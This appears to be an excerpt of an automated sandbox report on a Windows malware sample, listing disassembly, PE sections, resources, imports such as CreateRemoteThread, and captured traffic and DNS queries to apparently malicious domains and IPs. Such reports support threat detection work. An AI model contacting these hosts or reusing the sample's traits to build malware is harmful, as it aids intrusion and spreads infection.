                                            push eax
                                            call dword ptr [0040109Ch]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            jmp 00007F6C9514A718h
                                            mov eax, 00000001h
                                            ret
                                            mov esp, dword ptr [ebp-18h]
                                            mov dword ptr [ebp-78h], 000000FFh
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov eax, dword ptr [ebp-78h]
                                            jmp 00007F6C9514A847h
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            call 00007F6C9514A884h
                                            mov dword ptr [ebp-6Ch], eax
                                            push 00000001h
                                            call 00007F6C9515816Ah
                                            add esp, 04h
                                            test eax, eax
                                            jne 00007F6C9514A6FCh
                                            push 0000001Ch
                                            call 00007F6C9514A83Ch
                                            add esp, 04h
                                            call 00007F6C951537E4h
                                            test eax, eax
                                            jne 00007F6C9514A6FCh
                                            push 00000010h

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [ASM] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
                                            • [RES] VS2008 build 21022
                                            • [C++] VS2008 build 21022

                                            Data Directories

                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e1c4 | 0x50 | .text
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x150000 | 0x8728 | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x159000 | 0x1df8 | .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x13a0 | 0x1c | .text
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9100 | 0x40 | .text
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x34c | .text
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                             Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x1000 | 0x3e57e | 0x3e600 | False | 0.582117359719 | data | 6.96486152385 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                             .data | 0x40000 | 0x10c988 | 0x1800 | False | 0.340657552083 | data | 3.47052178831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                             .kipex | 0x14d000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                             .him | 0x14e000 | 0xea | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                             .hakir | 0x14f000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                             .rsrc | 0x150000 | 0x8728 | 0x8800 | False | 0.594812729779 | data | 5.84048651179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc | 0x159000 | 0x465a | 0x4800 | False | 0.347710503472 | data | 3.69715033583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                             Name | RVA | Size | Type | Language | Country
                                             AFX_DIALOG_LAYOUT | 0x157048 | 0x2 | data | Dutch | Netherlands
                                             AFX_DIALOG_LAYOUT | 0x157040 | 0x2 | data | Dutch | Netherlands
                                             AFX_DIALOG_LAYOUT | 0x157050 | 0x2 | data | Dutch | Netherlands
                                             AFX_DIALOG_LAYOUT | 0x157058 | 0x2 | data | Dutch | Netherlands
                                             CIDAFICUDUROSOTAROM | 0x156628 | 0x6c7 | ASCII text, with very long lines, with no line terminators | Assamese | India
                                             VIDIWAYAPENIGU | 0x156cf0 | 0x2fa | ASCII text, with very long lines, with no line terminators | Assamese | India
                                             RT_CURSOR | 0x157060 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Dutch | Netherlands
                                             RT_ICON | 0x150740 | 0x6c8 | data | Assamese | India
                                             RT_ICON | 0x150e08 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
                                             RT_ICON | 0x151370 | 0x10a8 | data | Assamese | India
                                             RT_ICON | 0x152418 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Assamese | India
                                             RT_ICON | 0x152da0 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
                                             RT_ICON | 0x153258 | 0x8a8 | data | Assamese | India
                                             RT_ICON | 0x153b00 | 0x6c8 | data | Assamese | India
                                             RT_ICON | 0x1541c8 | 0x568 | GLS_BINARY_LSB_FIRST | Assamese | India
                                             RT_ICON | 0x154730 | 0x10a8 | data | Assamese | India
                                             RT_ICON | 0x1557d8 | 0x988 | data | Assamese | India
                                             RT_ICON | 0x156160 | 0x468 | GLS_BINARY_LSB_FIRST | Assamese | India
                                             RT_STRING | 0x157920 | 0xe4 | data | Dutch | Netherlands
                                             RT_STRING | 0x157a08 | 0x3bc | data | Dutch | Netherlands
                                             RT_STRING | 0x157dc8 | 0x6e6 | data | Dutch | Netherlands
                                             RT_STRING | 0x1584b0 | 0x1a0 | data | Dutch | Netherlands
                                             RT_STRING | 0x158650 | 0xd8 | data | Dutch | Netherlands
                                             RT_ACCELERATOR | 0x157000 | 0x10 | data | Dutch | Netherlands
                                             RT_ACCELERATOR | 0x156ff0 | 0x10 | data | Dutch | Netherlands
                                             RT_GROUP_CURSOR | 0x157908 | 0x14 | data | Dutch | Netherlands
                                             RT_GROUP_ICON | 0x153208 | 0x4c | data | Assamese | India
                                             RT_GROUP_ICON | 0x1565c8 | 0x5a | data | Assamese | India
                                             None | 0x157020 | 0xa | data | Dutch | Netherlands
                                             None | 0x157030 | 0xa | data | Dutch | Netherlands
                                             None | 0x157010 | 0xa | data | Dutch | Netherlands

                                            Imports

                                             DLL | Import
                                             KERNEL32.dll | DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
                                             USER32.dll | OemToCharA
                                             ADVAPI32.dll | GetFileSecurityA

Possible Origin

Language of compilation system | Country where language is spoken
Dutch | Netherlands
Assamese | India

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 20:29:10.022617102 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.040724993 CET | 80 | 49776 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.040833950 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.040967941 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.040987968 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.061697960 CET | 80 | 49776 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.161679983 CET | 80 | 49776 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.163666010 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.164652109 CET | 49776 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.181844950 CET | 80 | 49776 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.491770983 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.509166956 CET | 80 | 49777 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.509269953 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.509358883 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.510267019 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.526633024 CET | 80 | 49777 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.527496099 CET | 80 | 49777 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.633177996 CET | 80 | 49777 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.634684086 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.634809971 CET | 49777 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.652122974 CET | 80 | 49777 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.660783052 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.678258896 CET | 80 | 49778 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.678359985 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.678431034 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.678451061 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.695811987 CET | 80 | 49778 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.800823927 CET | 80 | 49778 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.800962925 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.805845976 CET | 49778 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.823174953 CET | 80 | 49778 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.835488081 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.852793932 CET | 80 | 49779 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.855110884 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.855258942 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.859095097 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.872654915 CET | 80 | 49779 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.876432896 CET | 80 | 49779 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.971247911 CET | 80 | 49779 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:10.971352100 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.971648932 CET | 49779 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:10.988930941 CET | 80 | 49779 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.003556013 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.020915031 CET | 80 | 49780 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.021145105 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.021188974 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.021203041 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.038378000 CET | 80 | 49780 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.152443886 CET | 80 | 49780 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.153122902 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.153377056 CET | 49780 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.170557022 CET | 80 | 49780 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.184070110 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.202044010 CET | 80 | 49781 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.202202082 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.202297926 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.202322960 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.219639063 CET | 80 | 49781 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.323678970 CET | 80 | 49781 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.324387074 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.324666977 CET | 49781 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:11.331758976 CET | 49782 | 80 | 192.168.2.4 | 185.186.142.166
Jan 14, 2022 20:29:11.341969967 CET | 80 | 49781 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:11.387983084 CET | 80 | 49782 | 185.186.142.166 | 192.168.2.4
Jan 14, 2022 20:29:11.900846004 CET | 49782 | 80 | 192.168.2.4 | 185.186.142.166
Jan 14, 2022 20:29:11.957149029 CET | 80 | 49782 | 185.186.142.166 | 192.168.2.4
Jan 14, 2022 20:29:12.463393927 CET | 49782 | 80 | 192.168.2.4 | 185.186.142.166
Jan 14, 2022 20:29:12.519540071 CET | 80 | 49782 | 185.186.142.166 | 192.168.2.4
Jan 14, 2022 20:29:12.870682001 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:12.887943983 CET | 80 | 49783 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:12.889792919 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:12.889857054 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:12.889867067 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:12.907186985 CET | 80 | 49783 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.008774042 CET | 80 | 49783 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.008929968 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.009166956 CET | 49783 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.026371956 CET | 80 | 49783 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.307760000 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.325298071 CET | 80 | 49784 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.326244116 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.326380014 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.326399088 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.343657017 CET | 80 | 49784 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.444963932 CET | 80 | 49784 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.447304010 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.456474066 CET | 49784 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.473978043 CET | 80 | 49784 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.490773916 CET | 49785 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.508124113 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.508218050 CET | 49785 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.508342028 CET | 49785 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.568973064 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.609756947 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.609818935 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.609901905 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.609946012 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.609973907 CET | 49785 | 80 | 192.168.2.4 | 8.209.70.0
Jan 14, 2022 20:29:13.609983921 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4
Jan 14, 2022 20:29:13.610024929 CET | 80 | 49785 | 8.209.70.0 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 20:29:09.717817068 CET | 192.168.2.4 | 8.8.8.8 | 0xc52 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.181456089 CET | 192.168.2.4 | 8.8.8.8 | 0x50b7 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.642838955 CET | 192.168.2.4 | 8.8.8.8 | 0xc074 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.815781116 CET | 192.168.2.4 | 8.8.8.8 | 0xdff0 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:10.981431007 CET | 192.168.2.4 | 8.8.8.8 | 0x1085 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:11.163989067 CET | 192.168.2.4 | 8.8.8.8 | 0xa4aa | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:12.559750080 CET | 192.168.2.4 | 8.8.8.8 | 0xa259 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:13.018269062 CET | 192.168.2.4 | 8.8.8.8 | 0x778e | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:13.470618010 CET | 192.168.2.4 | 8.8.8.8 | 0x833b | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.160757065 CET | 192.168.2.4 | 8.8.8.8 | 0x3a22 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.331547976 CET | 192.168.2.4 | 8.8.8.8 | 0xd7c9 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:15.498477936 CET | 192.168.2.4 | 8.8.8.8 | 0x4bcf | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.069087982 CET | 192.168.2.4 | 8.8.8.8 | 0xa142 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.254492044 CET | 192.168.2.4 | 8.8.8.8 | 0x4c77 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.430603027 CET | 192.168.2.4 | 8.8.8.8 | 0x81eb | Standard query (0) | unicupload.top | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.583122015 CET | 192.168.2.4 | 8.8.8.8 | 0xc787 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.754019022 CET | 192.168.2.4 | 8.8.8.8 | 0x40fb | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:16.923821926 CET | 192.168.2.4 | 8.8.8.8 | 0xca44 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:17.383294106 CET | 192.168.2.4 | 8.8.8.8 | 0x863 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:17.549067974 CET | 192.168.2.4 | 8.8.8.8 | 0x9726 | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.420042992 CET | 192.168.2.4 | 8.8.8.8 | 0x96a6 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.596793890 CET | 192.168.2.4 | 8.8.8.8 | 0xe326 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:19.781554937 CET | 192.168.2.4 | 8.8.8.8 | 0x1a4e | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:20.140119076 CET | 192.168.2.4 | 8.8.8.8 | 0x4a7f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.354924917 CET | 192.168.2.4 | 8.8.8.8 | 0x10bc | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.519073963 CET | 192.168.2.4 | 8.8.8.8 | 0xaddd | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.720685959 CET | 192.168.2.4 | 8.8.8.8 | 0x5f8e | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:23.898070097 CET | 192.168.2.4 | 8.8.8.8 | 0x1acd | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:25.476651907 CET | 192.168.2.4 | 8.8.8.8 | 0xf661 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:25.665709019 CET | 192.168.2.4 | 8.8.8.8 | 0x14c4 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:25.838196993 CET | 192.168.2.4 | 8.8.8.8 | 0xe7cb | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:35.077847004 CET | 192.168.2.4 | 8.8.8.8 | 0x9952 | Standard query (0) | microsoft-com.mail.protection.outlook.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:37.770320892 CET | 192.168.2.4 | 8.8.8.8 | 0x3059 | Standard query (0) | patmushta.info | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:47.191591024 CET | 192.168.2.4 | 8.8.8.8 | 0x55ea | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:47.362592936 CET | 192.168.2.4 | 8.8.8.8 | 0x7678 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:47.820290089 CET | 192.168.2.4 | 8.8.8.8 | 0xcf52 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.001112938 CET | 192.168.2.4 | 8.8.8.8 | 0xbff0 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.171740055 CET | 192.168.2.4 | 8.8.8.8 | 0xa2f1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.384460926 CET | 192.168.2.4 | 8.8.8.8 | 0x8df1 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.576780081 CET | 192.168.2.4 | 8.8.8.8 | 0x4328 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.759460926 CET | 192.168.2.4 | 8.8.8.8 | 0xfe2b | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:48.955866098 CET | 192.168.2.4 | 8.8.8.8 | 0xd0 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:49.140610933 CET | 192.168.2.4 | 8.8.8.8 | 0x4039 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:49.306057930 CET | 192.168.2.4 | 8.8.8.8 | 0xa0aa | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:49.476068974 CET | 192.168.2.4 | 8.8.8.8 | 0xc6d3 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:49.657352924 CET | 192.168.2.4 | 8.8.8.8 | 0x8431 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:49.830569029 CET | 192.168.2.4 | 8.8.8.8 | 0x8d3d | Standard query (0) | data-host-coin-8.com | A (IP address) | IN (0x0001)
Jan 14, 2022 20:29:53.056298018 CET | 192.168.2.4 | 8.8.8.8 | 0xee16 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
